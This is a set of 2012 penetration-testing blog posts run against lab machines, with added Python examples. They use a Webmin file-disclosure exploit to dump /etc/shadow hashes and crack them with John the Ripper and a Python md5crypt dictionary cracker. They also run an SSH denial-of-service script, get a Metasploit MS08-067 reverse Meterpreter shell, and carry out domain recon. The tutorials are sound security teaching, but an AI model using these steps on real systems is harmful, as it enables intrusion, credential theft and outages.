
Tuesday, January 31, 2012

How to Crack Linux Passwords Using John the Ripper

We obtained /etc/passwd and /etc/shadow from the target in the previous article, Privilege Escalation (Step by Step to get Linux username and Password) in Backtrack 5.

Now we try to crack them. The first step is to save the two files locally as text files. In this case we save the contents of /etc/passwd as passwd.txt and /etc/shadow as shadow.txt.

Then combine the two files with the unshadow tool that ships with John the Ripper. It joins each /etc/passwd entry with the hash from the matching /etc/shadow entry, which is the input format john expects. Write the result to a fresh file (> rather than >>) so that leftovers from an earlier run are not appended.


root@bt:/pentest/passwords/john# ./unshadow passwd.txt shadow.txt > crack.txt


The next step is to crack crack.txt using john. With no options it runs single-crack mode, then its wordlist with rules, then incremental (brute-force) mode. The "FreeBSD MD5" label means the hashes are md5crypt ($1$ prefix): salted, so each user has to be attacked separately, but cheap enough that dictionary attacks are practical. Once john finishes (or you stop it with Ctrl-C and continue later with ./john --restore), print the recovered passwords with ./john --show crack.txt.

root@bt:/pentest/passwords/john# ./john crack.txt
Loaded 5 password hashes with 5 different salts (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:00:47 25.23% (2) (ETA: Wed Feb  1 10:23:59 2012)  c/s: 3943  trying: olivier9
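The two steps above, unshadow and then guessing, written out in Python as an added example (this is not code from the original post and not John the Ripper's own code). It re-implements the "FreeBSD MD5" (md5crypt, $1$) algorithm from the FreeBSD crypt(3) description, so the per-candidate work john is doing is visible, merges passwd and shadow the way unshadow does, and runs a small wordlist against the result. The passwd/shadow lines, salts, passwords and wordlist are constructed for the demonstration, not the pWnOS files; the hashes are generated by the md5crypt() function itself. The optional cross-check against the platform's crypt(3) uses the stdlib crypt module, which was removed in Python 3.13, so it simply reports None where that module is missing.

```python
"""Unshadow and dictionary-crack md5crypt ($1$) hashes in pure Python.
Added example: not part of the original post and not John the Ripper's code.
It repeats the two steps above (unshadow, then guess) with the "FreeBSD MD5"
algorithm written out, so it is clear what john is doing per candidate.
Sample passwd/shadow lines and the wordlist are constructed; see below.
"""
import hashlib
import warnings
from typing import Dict, Iterable, List, Optional

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(v: int, n: int) -> bytes:
    """md5crypt's own base-64 variant: n characters, least significant 6 bits first."""
    return bytes(ITOA64[(v >> (6 * k)) & 0x3F] for k in range(n))


def md5crypt(password: str, salt: str) -> str:
    """FreeBSD md5crypt as in crypt(3): '$1$' + salt (max 8 chars) + '$' + 22 chars."""
    pw, salt_b, magic = password.encode(), salt.encode()[:8], b"$1$"
    ctx = hashlib.md5(pw + magic + salt_b)
    final = hashlib.md5(pw + salt_b + pw).digest()
    pl = len(pw)
    while pl > 0:                       # feed len(pw) bytes of the inner digest
        ctx.update(final[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                            # the spec's quirk: NUL or pw[0] per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):               # 1000 rounds with a varying input order
        h = hashlib.md5(pw if i & 1 else final)
        if i % 3:
            h.update(salt_b)
        if i % 7:
            h.update(pw)
        h.update(final if i & 1 else pw)
        final = h.digest()
    out = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                   for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)))
    return (magic + salt_b + b"$" + out + _to64(final[11], 2)).decode()


def unshadow(passwd_lines: Iterable[str], shadow_lines: Iterable[str]) -> List[str]:
    """What JtR's unshadow does: put the shadow hash where /etc/passwd has 'x'."""
    hashes = {l.split(":")[0]: l.split(":")[1] for l in shadow_lines if ":" in l}
    merged = []
    for line in passwd_lines:
        f = line.rstrip("\n").split(":")
        if len(f) >= 2 and f[1] == "x" and f[0] in hashes:
            f[1] = hashes[f[0]]
        merged.append(":".join(f))
    return merged


def dictionary_attack(merged: Iterable[str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Try every word against every $1$ hash (salted, so per user); return user -> password."""
    words, found = list(wordlist), {}
    for line in merged:
        user, stored = line.split(":")[:2]
        if not stored.startswith("$1$"):
            continue                    # '*', '!' or another hash type: nothing to do here
        salt = stored.split("$")[2]
        for w in words:
            if md5crypt(w, salt) == stored:
                found[user] = w
                break
    return found


def agrees_with_platform_crypt(password: str, salt: str) -> Optional[bool]:
    """Cross-check against libc crypt(3) through the stdlib crypt module (removed in
    Python 3.13). Returns None when the module or md5crypt support is unavailable."""
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", DeprecationWarning)
        try:
            import crypt
        except ImportError:
            return None
    ref = crypt.crypt(password, "$1$" + salt)
    if not ref or not ref.startswith("$1$"):
        return None
    return ref == md5crypt(password, salt)


# Constructed sample input (not the pWnOS files): hashes are generated here with
# md5crypt() and invented salts; 'Winter2012' is in the wordlist, the root password is not.
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh",
    "obama:x:1001:1001::/home/obama:/bin/bash",
]
SAMPLE_SHADOW = [
    "root:" + md5crypt("Sup3r-s3cret-r00t!", "ab12cd34") + ":14041:0:99999:7:::",
    "daemon:*:14040:0:99999:7:::",
    "obama:" + md5crypt("Winter2012", "zz99zz99") + ":14041:0:99999:7:::",
]
WORDLIST = ["password", "123456", "obama", "Winter2012", "letmein"]

if __name__ == "__main__":
    merged = unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)
    print("\n".join(merged))
    print("cracked:", dictionary_attack(merged, WORDLIST))
    print("matches libc crypt:", agrees_with_platform_crypt("Winter2012", "zz99zz99"))
```

Because the salt is different for every user, a guess has to be hashed once per account, which is why john reports "5 different salts" and why the c/s figure above is per-hash work; a wordlist that misses (root here) simply leaves the account uncracked.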

Privilege Escalation (Step by Step to get Linux username and Password) in Backtrack 5

1. Information Gathering Step

A. Using Zenmap

Our target IP is 192.168.0.21.
From the scan we know the running services: ssh, http, and netbios.

B. Open the target in a web browser
Because an http service is running, we open it in a browser
and follow how the web site works.

Then try changing the GET parameters. In this case we change the "true" value in the address bar, and an error message appears.
From the error message we learn that the web files live in /var/www/ and the file is named index1.php.

2. Service Enumeration Step
From Zenmap we know the running services and the ports they use. We can get deeper information about each service with Nessus.
Fill in the target's IP address and choose the Internal Network Scan policy for an intranet target.
The report shows the running services and their severity level. Click a service for the details.
3. Vulnerability Assessment
From the details we analyze each service's vulnerabilities, then choose one and try to exploit it. In this case we choose port 10000/http (Webmin).
The details tell us that the Webmin version is below 1.296 and the Usermin version is below 1.226.
4. Exploit using exploitdb
Open it via K-menu - Apps - Exploitation Tools - Open Source Exploitation - Exploitdb - exploitdb directory.
Then search the database for exploit scripts by typing ./searchsploit webmin. The following scripts are returned:
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt

Because the target's vulnerability is in the Webmin application and its version is below 1.296, the two arbitrary file disclosure scripts are the candidates:
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl

Note that the version ranges do not line up exactly: Nessus only said "below 1.296", while these exploits cover Webmin below 1.290 (and Usermin below 1.220). A Webmin 1.290 to 1.295 would not be affected, so check the exact version before relying on the script; Webmin's miniserv reports it in the Server: MiniServ/... HTTP response header. Here it turns out to be vulnerable.

In this case we use the perl version, Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl, to read files from the Linux target and learn its usernames.

Running the script with no arguments prints its usage:

root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

So the syntax is perl 2017.pl <url> <port> <filename> <target>, where target 0 selects plain HTTP and 1 selects HTTPS.

For our target we type perl 2017.pl 192.168.0.21 10000 /etc/passwd 0: the IP is 192.168.0.21 and Webmin listens on port 10000.

With this script we can read files on the target from our own machine.
First we look at the web application files in /var/www/:
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/

FILE CONTENT STARTED
-----------------------------------
<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>

<p>This is the help page. If you would like help, click the next button below.</p>
<p>
<button style="width:65;height:65" onClick="window.location='index1.php?help=true&connect=true'"><b>Next</b></button>
</p>

-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index2.php 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/index2.php

FILE CONTENT STARTED
-----------------------------------
<html><body>
<p><b>HAHAHAHA!
<?php
echo $_GET['name'] . ", for a " . $_GET['level'] . " you REALLY SUCK!";


?>
</p>
<br>
<p>
<a href=index1.php?help=true&connect=true>Want to try again?</a>

</p>

</body>
</html>

-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/index1.php 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/index1.php

FILE CONTENT STARTED
-----------------------------------
<?php

?>
<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>

<p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>

<?php

//if($_GET['help'] == 'true'){
include('ssiaddon.php');
//}

if($_GET['connect'] != 'true'){
include($_GET['connect']);
}

?>

</body>
</HTML>

-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /var/www/ssiaddon.php 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /var/www/ssiaddon.php

FILE CONTENT STARTED
-----------------------------------
<form name="form" method="GET" action="index2.php">
<table border=1>
<tr><td width=175>
Name:
</td>
<td width=175>
<input type = "text" name="name" size=25>
</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>
<tr>
<td>
Skillz:
</td>
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>
</tr>
<tr><td width=175>
<input type = "submit" name = "submit" value = "Please Help!">
</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
<td>&nbsp;</td>
</tr>

</table>
</form>



-------------------------------------

Before moving on, note what the disclosed index1.php source shows: include($_GET['connect']) hands a user-controlled GET parameter straight to include(), which is a file inclusion vulnerability in its own right and a second route into this host, independent of Webmin.

To get the usernames on the Linux target we read /etc/passwd:
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/passwd

FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

-------------------------------------
So the accounts with a real login shell are root, vmware, obama, osama, and yomama; the rest are service accounts. The password hashes are not in /etc/passwd (the x in the second field) but in /etc/shadow, which is normally readable only by root. Because Webmin's miniserv runs as root, the same file disclosure reads it too:
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# perl 2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow

FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::





Now we have the hashed passwords: md5crypt ($1$) hashes for root, vmware, obama, osama and yomama. The * and ! entries are locked accounts with no password to crack. The third field is the day of the last password change, counted from 1970-01-01. We can try to crack the hashes with John the Ripper in BackTrack.

Read ....   How to crack passwords with John the Ripper in Backtrack 5
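The triage that the two listings above call for, as an added example (not code from the original post): which accounts can actually log in, which shadow entries carry a crackable hash rather than a lock marker, what hash type it is, and when the password was last changed. The embedded lines are copied from the /etc/passwd and /etc/shadow output above (only a subset of the service accounts is kept for brevity); nothing else is fabricated. Running it shows five crackable accounts, not the three the post names, and that every password dates from June 2008.

```python
"""Triage /etc/passwd + /etc/shadow: who can log in, whose hash is worth feeding to john.
Added example, not part of the original post. Data lines are copied from the listings above.
"""
import datetime
from typing import Dict, List

PASSWD_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/bin/sh",
    "www-data:x:33:33:www-data:/var/www:/bin/sh",
    "mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false",
    "sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin",
    "vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash",
    "obama:x:1001:1001::/home/obama:/bin/bash",
    "osama:x:1002:1002::/home/osama:/bin/bash",
    "yomama:x:1003:1003::/home/yomama:/bin/bash",
]
SHADOW_LINES = [
    "root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::",
    "daemon:*:14040:0:99999:7:::",
    "www-data:*:14040:0:99999:7:::",
    "mysql:!:14040:0:99999:7:::",
    "sshd:!:14040:0:99999:7:::",
    "vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::",
    "obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::",
    "osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::",
    "yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::",
]

NO_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin", "/bin/sync"}
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
                 "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def is_locked(field: str) -> bool:
    """passwd -l prefixes '!' but keeps the hash; the hash is still crackable offline."""
    return field.startswith("!")


def hash_kind(field: str) -> str:
    """Classify the second shadow field: the crypt scheme, or 'locked' / 'empty'."""
    if field == "":
        return "empty"                  # no password at all
    core = field.lstrip("!")
    if core == "" or core.startswith("*"):
        return "locked"                 # '*', '!', '!!' never match any password
    for prefix, name in HASH_PREFIXES.items():
        if core.startswith(prefix):
            return name
    return "descrypt" if len(core) == 13 else "unknown"   # legacy 13-char DES crypt


def days_to_date(days: int) -> str:
    """Shadow field 3 is days since 1970-01-01; return it as an ISO date."""
    return (datetime.date(1970, 1, 1) + datetime.timedelta(days=days)).isoformat()


def parse_passwd(lines) -> Dict[str, dict]:
    out = {}
    for line in lines:
        f = line.rstrip("\n").split(":")
        if len(f) >= 7:
            out[f[0]] = {"uid": int(f[2]), "gid": int(f[3]), "home": f[5], "shell": f[6]}
    return out


def parse_shadow(lines) -> Dict[str, dict]:
    out = {}
    for line in lines:
        f = line.rstrip("\n").split(":")
        if len(f) >= 2:
            out[f[0]] = {"hash": f[1], "last_change": int(f[2]) if len(f) > 2 and f[2] else None}
    return out


def triage(passwd_lines, shadow_lines) -> List[dict]:
    """One row per passwd account; 'crackable' = real hash and a shell that permits login."""
    passwd, shadow = parse_passwd(passwd_lines), parse_shadow(shadow_lines)
    rows = []
    for user, p in passwd.items():
        s = shadow.get(user, {"hash": "", "last_change": None})
        kind = hash_kind(s["hash"])
        rows.append({
            "user": user, "uid": p["uid"], "shell": p["shell"], "hash_kind": kind,
            "locked": is_locked(s["hash"]),
            "last_change": days_to_date(s["last_change"]) if s["last_change"] is not None else None,
            "crackable": kind not in ("locked", "empty", "unknown") and p["shell"] not in NO_LOGIN_SHELLS,
        })
    return rows


if __name__ == "__main__":
    for r in triage(PASSWD_LINES, SHADOW_LINES):
        flag = "CRACK" if r["crackable"] else "skip "
        print(f"{flag} {r['user']:<10} uid={r['uid']:<6} {r['hash_kind']:<11} "
              f"changed={r['last_change']} shell={r['shell']}")
```

The last-change date matters in practice: a hash set years ago is likely shared with other systems the same person administers, so even a slow crack of one old md5crypt hash can pay off beyond this host.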





Friday, January 27, 2012

Using Nessus for Vulnerability Analysis and Exploitdb for Exploitation

1. Scan the hosts connected to the network using Zenmap.
2. Define the target for the vulnerability analysis.
3. Open Nessus by typing https://127.0.0.1:8834/ in the browser address bar.
4. Create a new scan and enter the address of the target.
5. Click Launch Scan.

6. Choose a service with a high severity finding.



7. Click it for detailed information.

8. Open exploitdb via Apps - Exploitation Tools - Open Source Exploitation - Exploit-DB - exploitdb directory.
9. Search for exploit scripts by typing ./searchsploit openssh to find exploitation scripts for OpenSSH.

10. Decide which one will be used.
11. For example we use 2444.sh, a DoS exploit. Read the script before running it:

cat platforms/multiple/dos/2444.sh

12. Its header shows how to run it:
( #
# usage: script <hostname>)

13. Type ./2444.sh 192.168.1.145. Since this is a denial-of-service exploit, expect the SSH service on the target to stop responding.


How to Exploit Windows XP using Metasploit and Nessus

In this tutorial we use Windows XP in a virtual machine. We assume the target's IP address is already known. Here is the connection between the Windows XP target and the Linux attacker...
Picture 1. IP Linux : 192.168.1.144

 Picture 2. IP Windows: 192.168.1.145

 Picture 3. Checking Windows Connection in LInux  

 Picture 4. Checking LInux Connection in Windows 

Now we analyze the target's vulnerabilities with Nessus. Open Nessus, click the Scans tab, then click Add.

Enter a name for the scan, Type: Run Now, Policy: Internal Network Scan, Scan Target: the target IP (here 192.168.1.145), then click Launch Scan.
     Picture 5. Adding Scan Target

You can see the list of vulnerabilities.

  Picture 6. Adding Scan Target

To focus on what can actually be exploited, filter the list by clicking "Show Filter" and checking "Exploits Exist".

Picture 7. Filters

Now there are fewer vulnerabilities; click one...

Picture 8. The list of port of filtering vulnerability

You will see picture 9.

Picture 9. The list of filtered vulnerabilities

There are two vulnerabilities on port 445; choose the one with high severity. The details show its description and solution. The plugin name starts with MS08-067...; this Microsoft bulletin number is how we find the matching Metasploit module.

Picture 10. The list detail information about vulnerability
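The filtering done by hand in the two posts above (step 6 of the Nessus/exploitdb post, and the "Exploits Exist" filter here) can be done on a Nessus export instead. The following is an added example, not code from the original post and not part of Nessus: it parses the .nessus (v2) XML format that the scanner exports, keeps findings that have a public exploit and are at least High severity, and reports the Metasploit module name Nessus records when it knows one. The report below is a constructed sample, not a real scan of 192.168.1.145; the plugin IDs and most names are illustrative, with only the MS08-067 name taken from the post.

```python
"""Filter a .nessus (v2) export down to exploitable, high-severity findings.
Added example, not part of the original post or of Nessus. SAMPLE_NESSUS is a
constructed report: plugin IDs and names are illustrative, not real plugin data.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

# Nessus severity scale: 0 info, 1 low, 2 medium, 3 high, 4 critical
SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="xp-target">
  <ReportHost name="192.168.1.145">
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="900001"
               pluginName="MS08-067: Microsoft Windows Server Service Remote Code Execution (sample)"
               pluginFamily="Windows">
    <exploit_available>true</exploit_available>
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>MS08-067 Microsoft Server Service Relative Path Stack Corruption</metasploit_name>
   </ReportItem>
   <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2" pluginID="900002"
               pluginName="SMB Signing Disabled (sample)" pluginFamily="Misc.">
    <exploit_available>false</exploit_available>
   </ReportItem>
   <ReportItem port="135" svc_name="epmap" protocol="tcp" severity="0" pluginID="900003"
               pluginName="DCE Services Enumeration (sample)" pluginFamily="Windows"/>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="3" pluginID="900004"
               pluginName="OpenSSH Multiple Vulnerabilities (sample)" pluginFamily="Misc.">
    <exploit_available>true</exploit_available>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""


def _flag(item: ET.Element, tag: str) -> bool:
    """Nessus writes boolean plugin attributes as child elements containing 'true'/'false'."""
    return item.findtext(tag, "false").strip().lower() == "true"


def parse_report(xml_text: str) -> List[Dict]:
    """Flatten every ReportItem of every host into a dict with the fields we triage on."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "severity": int(item.get("severity")),
                "plugin_id": item.get("pluginID"),
                "name": item.get("pluginName"),
                "exploit_available": _flag(item, "exploit_available"),
                "metasploit": _flag(item, "exploit_framework_metasploit"),
                "msf_name": item.findtext("metasploit_name"),
            })
    return findings


def exploitable(findings: List[Dict], min_severity: int = 3) -> List[Dict]:
    """The GUI's 'Exploits Exist' filter plus a severity floor, worst first."""
    hits = [f for f in findings if f["exploit_available"] and f["severity"] >= min_severity]
    return sorted(hits, key=lambda f: (-f["severity"], f["port"]))


def summarize(findings: List[Dict]) -> List[str]:
    """One line per finding, naming the Metasploit module where Nessus recorded one."""
    lines = []
    for f in findings:
        msf = "  [msf: %s]" % f["msf_name"] if f["metasploit"] and f["msf_name"] else ""
        lines.append("%s:%d/%s  %s  %s%s" % (f["host"], f["port"], f["protocol"],
                                             SEVERITY[f["severity"]], f["name"], msf))
    return lines


if __name__ == "__main__":
    print("\n".join(summarize(exploitable(parse_report(SAMPLE_NESSUS)))))
```

On a real export, replace SAMPLE_NESSUS with the file contents; the exploit_available flag is Nessus's own judgement and only tells you something public exists, so the searchsploit step still has to find and read the actual script.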

Now we start to exploit the system.
Open Metasploit in a terminal by typing "msfconsole" and wait until it has loaded.
Picture 11. The first view of metasploit

Select the exploit module matching the plugin name by typing msf > use exploit/windows/smb/ms08_067_netapi
Picture 12

Next choose the payload. A reverse TCP Meterpreter makes the target connect back to our machine, which works even when a firewall blocks inbound connections to the target:
set PAYLOAD windows/meterpreter/reverse_tcp
LHOST is our own address, 192.168.1.144, where the payload will connect back:
set LHOST 192.168.1.144
RHOST is the target, 192.168.1.145 (the module already defaults to port 445):
set RHOST 192.168.1.145
Run the exploit with
exploit

 Picture 13
Once a Meterpreter session opens, start a Windows command prompt through it by typing
execute -f cmd.exe -M -i
Now you are inside the Windows system and can run commands from the command prompt.
For example we run "dir" to list the directory contents.
Picture 14

Picture 15

Picture 16


Picture 17


Wednesday, January 25, 2012

Information Gathering for Sites


A. domain : is2c-dojo.net

1. Using dmitry

root@bt:/home# dmitry -wnsepb is2c-dojo.net
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:216.239.32.21
HostName:is2c-dojo.net

Gathered Inic-whois information for is2c-dojo.net
---------------------------------
Domain Name: IS2C-DOJO.NET
Registrar: CV. JOGJACAMP
Whois Server: whois.resellercamp.com
Referral URL: http://www.resellercamp.com
Name Server: PARTNERIT1.EARTH.ORDERBOX-DNS.COM
Name Server: PARTNERIT1.MARS.ORDERBOX-DNS.COM
Name Server: PARTNERIT1.MERCURY.ORDERBOX-DNS.COM
Name Server: PARTNERIT1.VENUS.ORDERBOX-DNS.COM
Status: clientTransferProhibited
Updated Date: 22-dec-2011
Creation Date: 22-dec-2011
Expiration Date: 22-dec-2012

2. Using Maltego

B. domain : is2c-dojo.com
1. Using dnsenum
root@bt:/pentest/enumeration/dns/dnsenum# ./dnsenum.pl is2c-dojo.com
dnsenum.pl VERSION:1.2.2

-----   is2c-dojo.com   -----                                                            
                                                                                         
                                                                                         
Host's addresses:                                                                        
__________________                                                                       
                                                                                         
is2c-dojo.com                            14400    IN    A        67.222.154.106          

                                                                                         
Name Servers:                                                                            
______________                                                                           
                                                                                         
ns1.partnerit.us                         5742     IN    A        67.222.154.106          
ns2.partnerit.us                         5742     IN    A        67.222.154.107

                                                                                         
Mail (MX) Servers:                                                                       
___________________                                                                      
                                                                                         
aspmx.l.google.com                       35       IN    A        74.125.47.27            

                                                                                         
Trying Zone Transfers and getting Bind Versions:                                         
_________________________________________________                                        
                                                                                         
                                                                                         
Trying Zone Transfer for is2c-dojo.com on ns2.partnerit.us ...
AXFR record query failed: NOERROR

ns2.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

Trying Zone Transfer for is2c-dojo.com on ns1.partnerit.us ...
AXFR record query failed: NOERROR

ns1.partnerit.us Bind Version: #9.3.6-P1-RedHat-9.3.6-16.P1.el5_7.1

brute force file not specified, bay.

Neither name server handed over the zone: no records came back from the AXFR request. The reported status is NOERROR rather than REFUSED, which is not what a deliberate allow-transfer denial usually looks like, so it is worth repeating the query by hand with dig axfr is2c-dojo.com @ns1.partnerit.us and reading the server's actual answer before writing the transfer off. Note also that both servers disclose their BIND version (9.3.6-P1 on RHEL 5) through the CHAOS-class version.bind query dnsenum sends; a defender would normally hide that with the version option in named.conf.
